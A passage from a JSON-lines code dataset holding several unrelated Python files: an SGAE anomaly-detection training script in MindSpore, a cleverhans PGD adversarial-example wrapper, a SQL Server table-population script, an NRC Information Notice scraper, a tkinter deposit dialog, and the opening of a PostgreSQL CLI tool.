ops\nfrom mindspore.train.callback import LossMonitor, TimeMonitor, Callback\nfrom mindspore import context, Tensor\nfrom mindspore import dtype as mstype\nfrom mindspore import load_checkpoint, load_param_into_net\nfrom dataset import create_dataset\nfrom model_utils.config import config as cfg\n\n\nclass CustomWithEvalCell(nn.Cell):\n \"\"\" CustomWithEvalCell \"\"\"\n def __init__(self, network):\n super(CustomWithEvalCell, self).__init__(auto_prefix=False)\n self.network = network\n\n def construct(self, data, label):\n scores, _, _ = self.network(data)\n return scores, label\n\n\nclass AUC_PR(nn.Metric):\n ''' AUC_PR '''\n\n def __init__(self):\n super(AUC_PR, self).__init__()\n self.clear()\n\n def clear(self):\n pass\n\n def update(self, *inputs):\n scores = inputs[0].asnumpy()\n y = inputs[1].asnumpy()\n\n self.auc = roc_auc_score(y, scores)\n self.pr = average_precision_score(y, scores)\n\n def eval(self):\n return self.auc, self.pr\n\n\nbest_auc = 0\nbest_pr = 0\n\n\nclass EvalCallback(Callback):\n \"\"\"\n Evaluation per epoch, and save the best AUC_PR checkpoint.\n \"\"\"\n\n def __init__(self, model, eval_ds, save_path=\"./\"):\n\n global best_auc\n global best_pr\n\n self.model = model\n self.eval_ds = eval_ds\n self.best_auc = best_auc\n self.best_pr = best_pr\n self.save_path = save_path\n self.print = ops.Print()\n\n def epoch_end(self, run_context):\n ''' epoch_end '''\n global best_auc\n global best_pr\n\n cb_params = run_context.original_args()\n cur_epoch = cb_params.cur_epoch_num\n res = self.model.eval(self.eval_ds)\n auc = res[\"auc_pr\"][0]\n pr = res[\"auc_pr\"][1]\n if auc+pr > self.best_auc + self.best_pr:\n self.best_pr = pr\n self.best_auc = auc\n best_auc = auc\n best_pr = pr\n if params_.data_name not in ['reuters', '20news']:\n ms.save_checkpoint(cb_params.train_network, \\\nos.path.join(self.save_path, f\"{data_name}_best_auc_pr_runs{run_index}.ckpt\"))\n else:\n ms.save_checkpoint(cb_params.train_network, os.path.join(self.save_path, \\\nf\"{data_name}_best_auc_pr_runs{run_index}_normal{normal_index}.ckpt\"))\n\n self.print(\"the best epoch is\", cur_epoch,\n \"best auc pr is\", self.best_auc, self.best_pr)\n\n\nclass CustomWithLossCell(nn.Cell):\n ''' CustomWithLossCell '''\n\n def __init__(self, backbone, norm_thresh, params):\n super(CustomWithLossCell, self).__init__(auto_prefix=False)\n self._backbone = backbone\n self.norm_thresh = norm_thresh\n self.params = params\n self.print = ops.Print()\n\n def construct(self, x, label):\n\n scores, x_dec, _ = self._backbone(x)\n anomal_flag = recog_anomal(\n x, x_dec, self.norm_thresh).astype(mstype.int32)\n recon_error = ms.numpy.mean(ms.numpy.multiply(x - x_dec, x - x_dec))\n dist_error = self.compute_dist_error(scores, anomal_flag, self.params)\n loss = recon_error + self.params['lam_dist'] * dist_error\n return loss\n\n def compute_dist_error(self, scores, anomal_flag, params):\n \"\"\" compute distance error \"\"\"\n ref = ms.numpy.randn((1000,))\n dev = scores - ms.numpy.mean(ref)\n inlier_loss = ms.numpy.absolute(dev)\n # outlier loss\n anomal_flag = ms.numpy.expand_dims(anomal_flag, 1)\n outlier_loss = ms.numpy.absolute(ms.numpy.maximum(\n params['a'] - scores, ms.numpy.zeros(scores.shape)))\n dist_error = ms.numpy.mean(\n (1 - anomal_flag) * inlier_loss + params['lam_out'] * anomal_flag * outlier_loss)\n return dist_error\n\n\nrun_index = 0\ndata_name = 0\n\n\ndef train_tabular(params):\n \"\"\" train tabular \"\"\"\n global params_\n params_ = params\n\n for _ in range(10):\n params.np_seed += 1\n\n x_train, y_train, x_val, y_val, x_test, y_test = LoadTabularData(\n params)\n x_train_whole = Tensor(x_train, dtype=mstype.float32)\n x_test_whole = Tensor(x_test, dtype=mstype.float32)\n y_test = y_test.astype(np.int32)\n y_val = y_val.astype(np.int32)\n y_train = y_train.astype(np.int32)\n auc = np.zeros(params.run_num)\n ap = np.zeros(params.run_num)\n global data_name\n data_name = params.data_name\n\n # Start Train\n for run_idx in tqdm(range(params.run_num)):\n start_time = time.time()\n global best_auc\n global best_pr\n global run_index\n run_index = run_idx\n best_auc = 0\n best_pr = 0\n model = SGAE(x_train_whole.shape[1], params.hidden_dim)\n optim = nn.Adam(model.trainable_params(), learning_rate=params.lr)\n\n if params.verbose and run_idx == 0:\n print(model)\n\n # One run\n for epoch in range(params.epochs):\n ds_train = create_dataset(x_train, y_train, params)\n ds_val = create_dataset(x_val, y_val, params, is_batch=False)\n\n epoch_time_start = time.time()\n\n # calculate norm thresh\n _, dec_train, _ = model(x_train_whole)\n norm = calculate_norm(x_train_whole, dec_train)\n norm_thresh = np.percentile(norm, params.epsilon)\n\n loss = 0\n recon_error = 0\n dist_error = 0\n\n auc_pr = AUC_PR()\n model_withloss = CustomWithLossCell(\n model, norm_thresh, vars(params))\n eval_net = CustomWithEvalCell(model)\n if params.device == \"Ascend\":\n model_withloss = Model(model_withloss, optimizer=optim, \\\n eval_network=eval_net, metrics={'auc_pr': auc_pr}, amp_level=\"O3\")\n else:\n model_withloss = Model(\n model_withloss, optimizer=optim, eval_network=eval_net, metrics={'auc_pr': auc_pr})\n\n eval_callback = EvalCallback(\n model_withloss, ds_val, save_path=\"./saved_model\")\n num_batches = ds_train.get_dataset_size()\n model_withloss.train(epoch=1, train_dataset=ds_train, callbacks=[TimeMonitor(\n 30), LossMonitor(100), eval_callback], dataset_sink_mode=False)\n print(\n f'Time cost per step is {(time.time() - start_time)/(num_batches)} seconds\\n')\n\n epoch_time = time.time() - epoch_time_start\n\n if params.verbose:\n if (epoch + 1) % params.print_step == 0 or epoch == 0:\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc_ = roc_auc_score(y_test, scores)\n ap_ = average_precision_score(y_test, scores)\n print(f'Epoch num:[{epoch+1}/{params.epochs}], Time:{epoch_time:.3f} ' +\\\n f'--Loss:{loss:.3f}, --RE:{recon_error:.3f}, --DE:{dist_error:.3f}, \\\n --DE_r:{dist_error*params.lam_dist:.3f},' +\\\n f'--AUC:{auc_:.3f} --AP:{ap_:.3f}')\n\n # Early Stop\n if params.early_stop:\n scores, _, _ = model(x_train_whole)\n scores = scores.asnumpy()\n if np.mean(scores) > params.a / 2:\n print(\n f'Early Stop at Epoch={epoch+1}, AUC={auc[run_idx]:.3f}')\n break\n\n # test\n param_dict = load_checkpoint(\n f\"./saved_model/{params.data_name}_best_auc_pr_runs{run_index}.ckpt\")\n load_param_into_net(model, param_dict)\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc[run_idx] = roc_auc_score(y_test, scores)\n ap[run_idx] = average_precision_score(y_test, scores)\n\n print(\n f'This run finished, AUC={auc[run_idx]:.3f}, AP={ap[run_idx]:.3f}')\n # RUN JUMP\n if run_idx > 5 and np.mean(auc[:run_idx]) < 0.5:\n print('RUN JUMP')\n print(f'Average AUC is : {np.mean(auc[:run_idx]):.3f}')\n print(f'AUC is : {auc}')\n break\n print(f'Train Finished, AUC={np.mean(auc):.3f}({np.std(auc):.3f}), AP=\\\n {np.mean(ap):.3f}({np.std(ap):.3f}),np_seed={params.np_seed}')\n return {'AUC': f'{np.mean(auc):.3f}({np.std(auc):.3f})', 'AP': f'{np.mean(ap):.3f}({np.std(ap):.3f})'}\n\n\nparams_ = {}\n\n\ndef train_image(params):\n ''' train image '''\n global params_\n params_ = params\n\n # Load data\n x_train, x_test, y_train, y_test = LoadImageData(params)\n x_train_whole = Tensor(x_train, dtype=mstype.float32)\n x_test_whole = Tensor(x_test, dtype=mstype.float32)\n\n auc = np.zeros(params.run_num)\n ap = np.zeros(params.run_num)\n\n global data_name\n data_name = params.data_name\n\n # Start Train\n for run_idx in tqdm(range(params.run_num)):\n global best_auc\n global best_pr\n global run_index\n run_index = run_idx\n best_auc = 0\n best_pr = 0\n model = SGAE(x_train_whole.shape[1], params.hidden_dim)\n optim = nn.Adam(model.trainable_params(), learning_rate=params.lr)\n\n if params.verbose and run_idx == 0:\n print(model)\n\n # One run\n for epoch in range(params.epochs):\n ds_train = create_dataset(x_train, y_train, params)\n ds_val = create_dataset(x_test, y_test, params, is_batch=False)\n\n epoch_time_start = time.time()\n # train\n\n # calculate norm thresh\n _, dec_train, _ = model(x_train_whole)\n norm = calculate_norm(x_train_whole, dec_train)\n norm_thresh = np.percentile(norm, params.epsilon)\n\n loss = 0\n recon_error = 0\n dist_error = 0\n\n auc_pr = AUC_PR()\n model_withloss = CustomWithLossCell(model, norm_thresh, params)\n eval_net = CustomWithEvalCell(model)\n model_withloss = Model(\n model_withloss, optimizer=optim, eval_network=eval_net, metrics={'auc_pr': auc_pr})\n eval_callback = EvalCallback(\n model_withloss, ds_val, save_path=\"./saved_model\")\n model_withloss.train(epoch=1, train_dataset=ds_train, callbacks=\\\n [TimeMonitor(30), LossMonitor(30), eval_callback], dataset_sink_mode=False)\n\n epoch_time = time.time() - epoch_time_start\n\n # test\n if params.verbose:\n if (epoch + 1) % params.print_step == 0 or epoch == 0:\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc_ = roc_auc_score(y_test, scores)\n ap_ = average_precision_score(y_test, scores)\n print(f'Epoch num:[{epoch+1}/{params.epochs}], Time:{epoch_time:.3f} ' +\\\n f'--Loss:{loss:.3f}, --RE:{recon_error:.3f}, --DE:\\\n {dist_error:.3f}, --DE_r:{dist_error*params.lam_dist:.3f},' +\\\n f'--AUC:{auc_:.3f} --AP:{ap_:.3f}')\n\n # Early Stop\n if params.early_stop:\n scores, _, _ = model(x_train_whole)\n scores = scores.asnumpy()\n if np.mean(scores) > params.a / 2:\n print(\n f'Early Stop at Epoch={epoch+1}, AUC={auc[run_idx]:.3f}')\n break\n\n # test\n param_dict = load_checkpoint(\n f\"./saved_model/{params.data_name}_best_auc_pr_runs{run_index}.ckpt\")\n load_param_into_net(model, param_dict)\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc[run_idx] = roc_auc_score(y_test, scores)\n ap[run_idx] = average_precision_score(y_test, scores)\n\n print(\n f'This run finished, AUC={auc[run_idx]:.3f}, AP={ap[run_idx]:.3f}')\n\n # RUN JUMP\n if run_idx > 5 and np.mean(auc[:run_idx]) < 0.5:\n print('RUN JUMP')\n print(f'Average AUC is : {np.mean(auc[:run_idx]):.3f}')\n print(f'AUC is : {auc}')\n break\n\n print(\n f'Train Finished, AUC={np.mean(auc):.3f}({np.std(auc):.3f}), AP={np.mean(ap):.3f}({np.std(ap):.3f})')\n return {'AUC': f'{np.mean(auc):.3f}({np.std(auc):.3f})', 'AP': f'{np.mean(ap):.3f}({np.std(ap):.3f})'}\n\n\nnormal_index = 0\n\n\ndef train_document(params):\n ''' train document '''\n global params_\n params_ = params\n\n # Load data\n dataloader = LoadDocumentData(params)\n\n auc = np.zeros((params.run_num, dataloader.class_num))\n ap = np.zeros((params.run_num, dataloader.class_num))\n\n global data_name\n data_name = params.data_name\n\n # Start Train\n for run_idx in tqdm(range(params.run_num)):\n\n global run_index\n run_index = run_idx\n for normal_idx in range(dataloader.class_num):\n\n global best_auc\n global best_pr\n global normal_index\n best_auc = 0\n best_pr = 0\n normal_index = normal_idx\n\n x_train, x_test, y_train, y_test = dataloader.preprocess(\n normal_idx)\n x_train_whole = Tensor(x_train, dtype=mstype.float32)\n x_test_whole = Tensor(x_test, dtype=mstype.float32)\n\n model = SGAE(x_train_whole.shape[1], params.hidden_dim)\n optim = nn.Adam(model.trainable_params(), learning_rate=params.lr)\n\n if params.verbose and normal_idx == 0 and run_idx == 0:\n print(model)\n\n # One run\n for epoch in range(params.epochs):\n\n ds_train = create_dataset(x_train, y_train, params)\n ds_val = create_dataset(x_test, y_test, params, is_batch=False)\n\n epoch_time_start = time.time()\n\n # calculate norm thresh\n _, dec_train, _ = model(x_train_whole)\n norm = calculate_norm(x_train_whole, dec_train)\n norm_thresh = np.percentile(norm, params.epsilon)\n\n loss = 0\n recon_error = 0\n dist_error = 0\n\n auc_pr = AUC_PR()\n model_withloss = CustomWithLossCell(model, norm_thresh, params)\n eval_net = CustomWithEvalCell(model)\n model_withloss = Model(\n model_withloss, optimizer=optim, eval_network=eval_net, metrics={'auc_pr': auc_pr})\n eval_callback = EvalCallback(\n model_withloss, ds_val, save_path=\"./saved_model\")\n model_withloss.train(epoch=1, train_dataset=ds_train, callbacks=\\\n[TimeMonitor(30), LossMonitor(1), eval_callback], dataset_sink_mode=False)\n epoch_time = time.time() - epoch_time_start\n\n # test\n if params.verbose:\n if (epoch + 1) % params.print_step == 0 or epoch == 0:\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc_ = roc_auc_score(y_test, scores)\n ap_ = average_precision_score(y_test, scores)\n print(f'Epoch num:[{epoch+1}/{params.epochs}], Time:{epoch_time:.3f} ' +\\\n f'--Loss:{loss:.3f}, --RE:{recon_error:.3f}, --\\\n DE:{dist_error:.3f}, --DE_r:{dist_error*params.lam_dist:.3f},' +\\\n f'--AUC:{auc_:.3f} --AP:{ap_:.3f}')\n # Early Stop\n if params.early_stop:\n scores, _, _ = model(x_train_whole)\n scores = scores.asnumpy()\n if np.mean(scores) > params.a / 2:\n print(\n f'Early Stop at Epoch={epoch+1}, AUC={auc[run_idx]:.3f}')\n break\n\n # test\n param_dict = \\\n load_checkpoint(f\"./saved_model/{params.data_name}\"+\\\n\"_best_auc_pr_runs{run_index}_normal{normal_idx}.ckpt\")\n load_param_into_net(model, param_dict)\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc[run_idx][normal_idx] = roc_auc_score(y_test, scores)\n ap[run_idx][normal_idx] = average_precision_score(y_test, scores)\n print(\n f'This run finished, AUC={np.mean(auc[run_idx]):.3f}, AP={np.mean(ap[run_idx]):.3f}')\n\n # RUN JUMP\n if run_idx > 5 and np.mean(auc[:run_idx]) < 0.5:\n print('RUN JUMP')\n print(f'Average AUC is : {np.mean(auc[:run_idx]):.3f}')\n print(f'AUC is : {auc}')\n break\n\n print(\n f'Train Finished, AUC={np.mean(auc):.3f}({np.std(auc):.3f}), AP={np.mean(ap):.3f}({np.std(ap):.3f})')\n return {'AUC': f'{np.mean(auc):.3f}({np.std(auc):.3f})', 'AP': f'{np.mean(ap):.3f}({np.std(ap):.3f})'}\n\n\ndef recog_anomal(data, x_dec, thresh):\n ''' Recognize anomaly\n '''\n norm = calculate_norm(data, x_dec)\n anomal_flag = norm.copy()\n anomal_flag[norm < thresh] = 0\n anomal_flag[norm >= thresh] = 1\n return anomal_flag\n\n\ndef calculate_norm(data, x_dec):\n ''' Calculate l2 norm\n '''\n delta = (data - x_dec)\n norm = ms.numpy.norm(delta, ord=2, axis=1)\n return norm\n\n\nif __name__ == '__main__':\n\n os.environ['ASCEND_GLOBAL_LOG_LEVEL'] = '4'\n os.environ['ASCEND_SLOG_PRINT_TO_STDOUT'] = '0'\n start_time_ = time.time()\n time_name = str(time.strftime(\"%m%d\")) + '_' + \\\n str(time.time()).split(\".\")[1][-3:]\n print(f'Time name is {time_name}')\n print(os.getcwd())\n metrics = pd.DataFrame()\n\n args = cfg\n\n if args.ms_mode == \"GRAPH\":\n context.set_context(mode=context.GRAPH_MODE)\n else:\n context.set_context(mode=context.PYNATIVE_MODE)\n\n context.set_context(device_target=args.device, device_id=0)\n\n if args.data_name in ['attack', 'bcsc', 'creditcard', 'diabetic', 'donor', 'intrusion', 'market']:\n an_metrics_dict = train_tabular(args)\n elif args.data_name in ['reuters', '20news']:\n an_metrics_dict = train_document(args)\n elif args.data_name in ['mnist']:\n an_metrics_dict = train_image(args)\n\n metrics = pd.DataFrame(an_metrics_dict, index=[0])\n metrics.to_csv(\n f'{args.out_dir}{args.model_name}_{args.data_name}_{time_name}.csv')\n\n print(f'Finished!\\nTotal time is {time.time()-start_time_:.2f}s')\n print(f'Current time is {time.strftime(\"%m%d_%H%M\")}')\n print(f'Results:')\n print(metrics.sort_values('AUC', ascending=False))\n ","sub_path":"community/cv/SGAE/.ipynb_checkpoints/SGAE_train-checkpoint.py","file_name":"SGAE_train-checkpoint.py","file_ext":"py","file_size_in_byte":19951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"370805216","text":"import torch\nfrom torch import nn\nimport numpy as np\nfrom cleverhans.torch.attacks.projected_gradient_descent import projected_gradient_descent as _pgd_fn\n\n\nclass ProjectedGradientDescent:\n def __init__(self, net, eps=0.07, a=0.01, K=40, norm=np.inf,\n max_min_bounds=None):\n self.net = net\n\n # variables\n self.eps = eps\n self.a = a\n self.K = K\n self.norm = norm\n self.max_min_bounds = max_min_bounds\n\n def __call__(self, x, eps=None):\n if eps is None:\n eps = self.eps\n return pgd_fn(self.net, x, eps, self.a, self.K, self.norm,\n self.max_min_bounds[0], self.max_min_bounds[1])\n\n\ndef pgd_fn(net, x, eps=0.07, a=0.01, K=40, norm=np.inf, max_bound=None,\n min_bound=None):\n adv_x = _pgd_fn(\n model_fn=net,\n x=x,\n eps=eps,\n eps_iter=a,\n nb_iter=K,\n norm=norm,\n clip_max=max_bound,\n clip_min=min_bound,\n sanity_checks=False)\n return adv_x\n","sub_path":"models/adversarial/untargeted/pgd.py","file_name":"pgd.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"374860593","text":"import pandas as pd\r\nimport pyodbc\r\nimport random\r\nconnection = pyodbc.connect('Driver={SQL Server};'\r\n 'Server=DESKTOP-4ONR3F7\\MSSQLSERVER01;'\r\n 'Database=DBMS;'\r\n 'Trusted_Connection=yes;')\r\nmycursor = connection.cursor()\r\ndef maketables():\r\n df=pd.read_csv('naukri_com-job_sample.csv')\r\n df1=pd.read_csv('candidate.csv')\r\n kf=pd.read_csv('user-languages.csv')\r\n qdf=pd.read_csv('questions.csv')\r\n skill_name=[]\r\n ctr=0\r\n a=list(df['jobtitle'])\r\n b=list(df['joblocation_address'])\r\n c=list(df['jobid'])\r\n d=list(df['jobdescription'])\r\n candidate_name=list(df1['Employee_Name'])\r\n candidate_id=list(df1['EmpID'])\r\n candidateage=[i for i in range(20,30)]\r\n employeeage=[i for i in range(25,65)]\r\n question_id=qdf['QCode']\r\n question_description=qdf['link']\r\n question_difficulty=qdf['level']\r\n question_tags=qdf['Tags']\r\n question_editorial=qdf['Editorial']\r\n for i in range(1,len(kf.columns)):\r\n if kf.columns[i] not in skill_name:\r\n ctr+=1\r\n skill_name.append(kf.columns[i])\r\n education=list(df['education'])\r\n experience=list(df['experience'])\r\n t0=[]\r\n t1=[]\r\n t2=[]\r\n t3=[]\r\n t4=[]\r\n t5=[]\r\n t6=[]\r\n t7=[]\r\n t8=[]\r\n t9=[]\r\n t10=[]\r\n sql11=\"insert into QUESTION_TAGS(QUESTION_ID,TAGS) values (?,?)\"\r\n sql10=\"insert into INTERVIEWER(EMPLOYEE_ID) values (?)\"\r\n sql9=\"insert into QUESTION_DIFFICULTY(QUESTION_ID,DIFFICULTY) values (?,?)\"\r\n sql8=\"insert into QUESTION_EXPLANATION(QUESTION_ID,EXPLANATION) values (?,?)\"\r\n sql7=\"insert into QUESTION(QUESTION_DESCRIPTION) values (?)\"\r\n sql6=\"insert into EMPLOYEE(EMPLOYEE_NAME,EMPLOYEE_AGE,EMPLOYEE_POSITION) values (?,?,?)\"\r\n sql5=\"insert into SKILLS(CANDIDATE_ID,SKILL_ID,LEVEL) values (?,?,?)\"\r\n sql3=\"insert into CANDIDATE(EXPERIENCE,NAME,AGE,EDUCATION,ROLE) values (?,?,?,?,?)\"\r\n sql1=\"insert into JOB_DETAILS(LOCATION,JOB_TITLE,FILLED) values (?,?,?)\"\r\n sql2=\"insert into JOB_ROLE(JOB_TITLE,JOB_DESCRIPTION) values (?,?)\"\r\n sql4=\"insert into SKILL_DETAILS(SKILL_NAME) values (?)\"\r\n interviewer_id=[]\r\n for i in range(1,76):\r\n for location in b[i].split(','):\r\n t0.append((location,a[i],'False'))\r\n t1.append((a[i],d[i][41:]))\r\n if str(education[i])=='nan':\r\n ede=None\r\n else:\r\n ede=str(education[i])\r\n t2.append((str(experience[i]),str(candidate_name[i]),random.choice(candidateage),ede,random.randint(76,123)))\r\n t5.append((str(candidate_name[i+76]),random.choice(employeeage),i))\r\n if len(interviewer_id)<37:\r\n while 1:\r\n curinterviewer_id=random.randint(1,75)\r\n if curinterviewer_id not in interviewer_id:\r\n break \r\n t9.append((curinterviewer_id,))\r\n interviewer_id.append(curinterviewer_id)\r\n \r\n for i in range(1,ctr):\r\n t3.append((skill_name[i],))\r\n for i in range(1,76):\r\n w=[]\r\n while len(w)<3:\r\n a=random.randint(1,1409)\r\n if a not in w:\r\n w.append(a)\r\n for j in range(3):\r\n t4.append((i,w[j],random.randint(0,10)))\r\n for i in range(1,len(question_id)+1):\r\n str1=\"\"\r\n for j in question_tags[i-1]:\r\n if j=='[' or j==']':\r\n pass\r\n elif j!=',':\r\n str1+=j\r\n else:\r\n str1+=\" \"\r\n str1=str1.split()\r\n t6.append((str(question_description[i-1]),))\r\n if str(question_editorial[i-1])=='nan':\r\n ed=None\r\n else:\r\n ed=str(question_editorial[i-1])\r\n t7.append((i,ed))\r\n t8.append((i,str(question_difficulty[i-1])))\r\n for k in str1:\r\n t10.append((i,k))\r\n for job in range(75):\r\n t0[job]=(t0[job][0],t0[job][1],\"True\")\r\n mycursor.executemany(sql1,t0)\r\n mycursor.executemany(sql2,t1)\r\n mycursor.executemany(sql3,t2)\r\n mycursor.executemany(sql4,t3)\r\n mycursor.executemany(sql5,t4)\r\n mycursor.executemany(sql6,t5)\r\n mycursor.executemany(sql7,t6)\r\n mycursor.executemany(sql8,t7)\r\n mycursor.executemany(sql9,t8)\r\n mycursor.executemany(sql10,t9)\r\n mycursor.executemany(sql11,t10)\r\n connection.commit()\r\n\r\ndef makeinterviewtable():\r\n result=['SOLVED','UNSOLVED','PARTIALLY SOLVED']\r\n interviewerID=list(mycursor.execute('select INTERVIEWER_ID from INTERVIEWER'))\r\n candidates=list(mycursor.execute('select CANDIDATE_ID,STATUS from CANDIDATE'))\r\n q=list(mycursor.execute('select QUESTION_ID from QUESTION'))\r\n for i in range(len(candidates)):\r\n if candidates[i][1]=='entry recieved':\r\n curinterviewer=random.choice(interviewerID)\r\n candidate_ID=candidates[i][0]\r\n res=random.choice(result)\r\n if res=='SOLVED':\r\n score=10\r\n elif res=='UNSOLVED':\r\n score=0\r\n else:\r\n score=None\r\n question_current=random.choice(q)\r\n sql1=\"insert into INTERVIEW(CANDIDATE_ID,INTERVIEWER_ID,RESULT,SCORE) output Inserted.INTERVIEW_ID values (?,?,?,?)\"\r\n mycursor.execute('update CANDIDATE SET STATUS=\\'ongoing\\' WHERE CANDIDATE_ID=?',candidate_ID)\r\n interviewid=mycursor.execute(sql1,(candidate_ID,curinterviewer[0],res,score)).fetchone()[0]\r\n sql2=\"insert into MAP(INTERVIEW_ID,QUESTION_ID) values (?,?)\"\r\n mycursor.execute(sql2,(interviewid,question_current[0]))\r\n connection.commit()\r\n \r\n \r\n \r\n \r\n \r\nmaketables()\r\nmakeinterviewtable()\r\n\r\n\r\n\r\n","sub_path":"dbms1.py","file_name":"dbms1.py","file_ext":"py","file_size_in_byte":5717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"486140288","text":"#! python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 5 15:40:54 2017\r\n\r\n@author: JBC4\r\n\r\nThis program scrapes the NRC public webpage for Generic Communications\r\n\r\n\"\"\"\r\n\r\nimport requests, bs4, re\r\nimport pandas as pd\r\n\r\nNRCproxies = { \r\n 'http': 'http://148.184.186.50:80',\r\n 'https': 'http://148.184.186.50:80',\r\n}\r\n\r\n\r\n# find all the IN references in a page\r\nregwebAddress = 'https://www.nrc.gov/reading-rm/doc-collections/gen-comm/info-notices/'\r\nmlWebString = 'https://www.nrc.gov/docs/'\r\n\r\ndf = pd.DataFrame()\r\n\r\nyears = list(range(1979,2020))\r\n\r\nfor i in range(0, len(years)):\r\n \r\n # read html table from site:\r\n df_list=pd.read_html(regwebAddress+str(years[i])+'/')\r\n dfToAppend = df_list[1]\r\n \r\n # remove junk columns and top row and synch column names:\r\n del dfToAppend[2]\r\n del dfToAppend[4]\r\n dfToAppend = dfToAppend.drop(dfToAppend.index[0]) # Drop titles row\r\n dfToAppend = dfToAppend.reset_index(drop=True) # reset row indices\r\n dfToAppend['Link']=\"\"\r\n dfToAppend.rename(columns = {0:'Number', 1:'Title', \r\n 3:'Date'}, inplace = True)\r\n \r\n # Get ML numbers and hyperlinks:\r\n res = requests.get(regwebAddress+str(years[i])+'/',proxies=NRCproxies)\r\n res.raise_for_status()\r\n gcSoup = bs4.BeautifulSoup(res.text, \"lxml\")\r\n \r\n if years[i] == 2002:\r\n table = gcSoup.find('table',{'summary':'NRC Information Notices: xxxx Index'})\r\n else:\r\n table = gcSoup.find('table',{'summary':'NRC Information Notices: ' +str(years[i])+' Index'})\r\n \r\n tableRows = table.find_all('tr')\r\n inRegex = re.compile(r'IN-\\d\\d-\\d+\\s\\w+.*\\s--\\s.*')\r\n\r\n for j in range(1,len(tableRows)): # for each table row (except title row)\r\n tableRowString=str(tableRows[j]) \r\n \r\n for k in range(0,len(dfToAppend['Number'])): # for each IN number\r\n testString = dfToAppend['Number'][k]\r\n if testString in tableRowString: #if you find it\r\n linkSoup = bs4.BeautifulSoup(tableRowString,\"lxml\")\r\n inLink = linkSoup.find_all('a',href=True)\r\n if inLink: # if there's a link, use it\r\n if years[i]==1990: #1990 links are different than others\r\n dfToAppend['Link'][k]='https://www.nrc.gov/reading-rm/doc-collections/gen-comm/info-notices/1990/'+inLink[0].attrs['href']\r\n elif testString =='IN-85-11': # IN 85-11 is linked wrong on site\r\n dfToAppend['Link'][k]='https://www.nrc.gov/reading-rm/doc-collections/gen-comm/info-notices/1985/'+inLink[0].attrs['href']\r\n \r\n else:\r\n dfToAppend['Link'][k]='https://www.nrc.gov'+inLink[0].attrs['href']\r\n else: # if not, use the general table link\r\n dfToAppend['Link'][k]=regwebAddress+str(years[i])+'/'\r\n \r\n # append dataframes\r\n if i ==0:\r\n df = dfToAppend\r\n else:\r\n df = df.append(dfToAppend,ignore_index=True)\r\n\r\n\r\n# drop rows with junk titles \"--\"\r\ndf = df[~df['Number'].str.contains('--')] \r\ndf.to_excel(\"Information Notices - Scraped from Public Site.xlsx\") \r\n","sub_path":"getINtables3.py","file_name":"getINtables3.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"252556109","text":"from tkinter import *\nfrom tkinter import messagebox\n\nroot = Tk()\n\nroot.geometry(\"450x400\")\nroot.title(\"Malaysia trip\")\nroot.config(bg=\"cyan\")\n\nresults = IntVar()\n\nent_lab = Label(root, text=\"Enter amount: \", bg=\"cyan\").place(x=10, y=70)\nuser_ent = Entry(root)\nuser_ent.place(x=120, y=70)\nuser_ent.focus()\n\ndef submit():\n if int(user_ent.get()) < 3000:\n raise Exception(messagebox.showinfo(\"STATUS FEEDBACK\", \"Please deposit more funds for this excursion\"))\n else:\n messagebox.showinfo(\"STATUS FEEDBACK\", \"You qualify for the malaysia trip. Congratulations\")\n\ndef exit():\n root.destroy()\n\nexit_btn = Button(root, text=\"Exit\", borderwidth=5, bg=\"blue\", command=exit).place(x=220, y=120)\ndeposit_btn = Button(root, text=\"Deposit\", borderwidth=5, bg=\"blue\", command=submit).place(x=120, y=120)\n\nroot.mainloop()\n","sub_path":"qulification_section.py","file_name":"qulification_section.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"333318059","text":"#!/usr/bin/env python\n# * coding: utf8 *\n'''\ncloudb\n\nUsage:\n cloudb enable extensions [--verbosity=]\n cloudb create schema [--schemas= --verbosity=]\n cloudb create admin-user [--verbosity=]\n cloudb create read-only-user [--verbosity=]\n cloudb drop schema [--schemas= --verbosity=]\n cloudb import [--missing --dry-run --verbosity= --skip-if-exists]\n cloudb trim [--dry-run --verbosity=]\n cloudb update [--table=... --dry-run --verbosity= --from-change-detection]\n\nArguments:\n name - all or any of the other iso categories\n level - VERBOSE DEBUG INFO WARNING FATAL\n'''\n\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\nfrom time import perf_counter\n\nimport psycopg2\nfrom colorama import Back, Fore, init\nfrom docopt import docopt\nfrom osgeo import gdal, ogr\n\nimport pyodbc\n\nfrom . import CONNECTION_TABLE_CACHE, LOG, config, roles, schema, utils\n\ngdal.SetConfigOption('MSSQLSPATIAL_LIST_ALL_TABLES', 'YES')\ngdal.SetConfigOption('PG_LIST_ALL_TABLES', 'YES')\ngdal.SetConfigOption('PG_USE_POSTGIS', 'YES')\ngdal.SetConfigOption('PG_USE_COPY', 'YES')\n\n\ndef execute_sql(sql, connection):\n '''executes sql on the information\n sql: string T-SQL\n connection: dict with connection information\n '''\n LOG.debug(f' executing {sql}')\n\n with psycopg2.connect(**connection) as conn:\n with conn.cursor() as cursor:\n cursor.execute(sql)\n\n conn.commit()\n\n\ndef enable_extensions():\n '''enable the database extension\n owner: string db owner\n '''\n LOG.info('enabling extensions')\n\n execute_sql('CREATE EXTENSION postgis;CREATE EXTENSION pg_stat_statements;', config.DBO_CONNECTION)\n\n\ndef _get_tables_with_fields(connection_string, specific_tables):\n '''creates a list of tables with fields from the connection string\n connection_string: string to connect to db\n specific_tables: array of tables to get in schema.table format\n returns: array of tuples with 0: schema, 1: table name: 2: array of field names\n '''\n layer_schema_map = []\n filter_tables = False\n\n if specific_tables and len(specific_tables) > 0:\n 